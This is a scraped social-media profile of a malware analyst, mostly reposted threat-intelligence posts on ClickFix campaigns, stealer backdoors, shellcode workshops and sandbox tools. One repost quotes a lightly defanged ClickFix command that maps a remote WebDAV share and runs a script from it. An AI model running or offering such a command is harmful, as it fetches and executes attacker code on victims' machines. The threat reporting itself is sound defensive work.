ExecuteMalware

17.3K posts

@executemalware

#malware hunter & analyst. Opinions are my own.

Cold country. Joined June 2016
187 Following, 26.9K Followers
ExecuteMalware reposted
ANY.RUN (@anyrun_app)
❗ macOS VM is now live ❗ 25K+ U.S. businesses already run on macOS. Yet #macOS threats remain a blind spot for many SOC teams. 👇 Close this gap now with a broader cross-platform threat visibility for faster and confident response! any.run/cybersecurity-…
ExecuteMalware reposted
The DFIR Report (@TheDFIRReport)
Threat Actors are "Bringing Their Own Forensics" In a recent ClickFix campaign, we saw threat actors likely related to Interlock Ransomware, running Volatility (vol.py) directly on victim machines. Commonly a tool for defenders, the TAs are using it to:
ExecuteMalware reposted
RussianPanda 🐼 🇺🇦 (@RussianPanda9xx)
Tax season is open 🎯 New blog just dropped on a malvertising campaign targeting W-2/W-9 searches since January 2026.
Google Ad -> dual-layer cloaking -> rogue ScreenConnect -> FatMalloc crypter (2GB alloc to choke AV emulators) -> previously undocumented Huawei audio driver killing EDR.
60+ rogue SC instances across our customer base 💀 huntress.com/blog/w2-malver…
ExecuteMalware reposted
RussianPanda 🐼 🇺🇦 (@RussianPanda9xx)
🚨 NEW VIDEO DROP FROM PANDA 🐼 I got a full walkthrough of @ThruntingLabs from @Kostastsale and this platform is different - no simulations. You are investigating REAL intrusions with REAL telemetry - query actual EDR logs in Elastic, Splunk, or Azure Log Analytics. If you're in blue team / SOC / IR or aspiring to be - I highly recommend checking it out 🔗 youtube.com/watch?v=YC-E5D…
ExecuteMalware reposted
Josh Stroschein | The Cyber Yeti
🏗️ You can’t create reliable Windows shellcode without a precise understanding of the Windows API. It's more than knowing the function—you must understand call order, handle preservation, and manual structure parsing. Watch Part 2 of the workshop here: 📺 youtu.be/xdCfeC7o2Ss
Once we move to assembly, the "safety net" is gone. No compiler to catch type mismatches or manage your stack:
🔹 You are the memory manager for your structures.
🔹 You must manually ensure calling conventions are followed.
🔹 You are responsible for calculating every member offset by hand.
ExecuteMalware reposted
Josh Stroschein | The Cyber Yeti
🐚 Custom Windows shellcode is the ultimate way to learn OS internals and sharpen your assembly skills.
🗺️ Video 1: The Game Plan. We start in C to map out the APIs and logic before hitting the ASM. Watch Part 1: 📺 youtu.be/6oeMEzCKXyo
✅ Dev/Debug workflows
✅ Position-Independence (PIC)
✅ Module & API hashing
✅ Stack strings & Endianness
✅ XOR obfuscation & Decryption stubs
ExecuteMalware reposted
Tim Blazytko (@mr_phrazer)
New blog post: Building a Pipeline for Agentic Malware Analysis. Agentic RE + malware analysis with custom skills, MCP tooling, and persistent case state to automate initial triage. Link: synthesis.to/2026/03/18/age… Github: github.com/mrphrazer/agen…
ExecuteMalware reposted
Jesko Hüttenhain (@huettenhain)
A lot of convenience added to #BinaryRefinery in 0.10.2 overall, so this might be a good time to update. Hey @greglesnewich, remember when you wanted DMG archive support? Guess what ...
ExecuteMalware reposted
Jane (@Jane_0sint)
#MuddyWater #Backdoor #Dindoor
What it does:
▪️ Steals Chrome/Firefox passwords & cookies
▪️ Dumps crypto wallets (Exodus, Atomic, +15 more)
▪️ Grabs Discord tokens & SSH keys
▪️ Takes screenshots via Windows API
▪️ Full PTY shell access
C2 uses WebSocket + HTTP fallback with server rotation.
#MuddyWater #MalwareAnalysis #Cybersecurity #DFIR #Iran #APT
C2 ✅ - OnLine app.any.run/tasks/6bf329f8…
ExecuteMalware reposted
Squiblydoo (@SquiblydooBlog)
Nice update to @anyrun_app that seems easy to miss: HTTPS decryption. If you look at the network traffic and click Network Threats, you can click into the analysis to see the decrypted traffic. You can also just download the entire decrypted PCAP. 1/3
ExecuteMalware reposted
JAMESWT (@JAMESWT_WT)
👇 http://rbcoeconsulting.]com/wp-content/plugins/pretty-manager/captcha.html
👇 cmd /c net use Z: http://94.156.170.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete
👇 app.any.run/tasks/80717be8…
JAMESWT (@JAMESWT_WT)

New #Click-Fix Variant / webdav / workflow Some Related Samples +extra 👇 bazaar.abuse.ch/browse/tag/185… AnyRun Zip app.any.run/tasks/9af568c0… Triage Zip tria.ge/260221-2ety2ae… Msi tria.ge/260201-sfg67ae… cc @1ZRR4H @ShadowOpCode @k3dg3
ExecuteMalware reposted
ANY.RUN (@anyrun_app)
👿 TrustConnect is a $300/month #RAT-as-a-Service hiding inside fake Zoom, Teams & Adobe installers. Signed with a fraudulent EV cert, streaming your screen via WebSocket, rebuilding under a new brand hours after takedown. 👉 Tech details & business impact: any.run/malware-trends…
ExecuteMalware reposted
txc (@0x747863)
IcedID Config extraction: Writeup for a challenge that is part of the Zero2Auto malware analysis course. txc.gitbook.io/documentation/… Also tried out the @REMnux MCP server to check out how AI can support my analysis approaches and learning overall.
ExecuteMalware reposted
ANY.RUN (@anyrun_app)
Top 10 last week's threats by uploads 🌐
⬆️ #Asyncrat 782 (533)
⬆️ #Xworm 431 (350)
⬆️ #Dcrat 427 (268)
⬆️ #Stealc 403 (215)
⬆️ #Vidar 351 (249)
⬆️ #Agenttesla 309 (241)
⬆️ #Gh0st 281 (143)
⬆️ #Remcos 270 (193)
⬆️ #Quasar 187 (158)
⬇️ #Salatstealer 181 (189)
Explore malware in action: app.any.run/?utm_source=tw… #Top10Malware